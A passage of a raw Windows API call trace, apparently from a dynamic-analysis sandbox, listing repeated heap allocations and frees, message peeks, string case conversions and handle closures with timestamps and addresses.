lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.071] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.071] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.071] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.071] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.072] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.072] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.072] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.072] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.072] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.072] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.072] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.072] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.072] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.072] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.072] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.072] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.072] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.072] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.072] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.072] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.072] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.073] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.073] CryptReleaseContext (hProv=0xad6480, dwFlags=0x0) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.074] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.074] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.074] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.074] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.075] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.075] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0199.075] FreeLibrary (hLibModule=0x74d40000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0199.076] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.076] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.076] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0199.076] CloseHandle (hObject=0x268) returned 1 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0199.077] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0199.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0199.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0199.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0199.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0199.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0199.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0199.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0199.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0199.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0199.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.078] CloseHandle (hObject=0x294) returned 1 [0199.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0199.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0199.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0199.098] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0199.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0199.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0199.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0199.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) 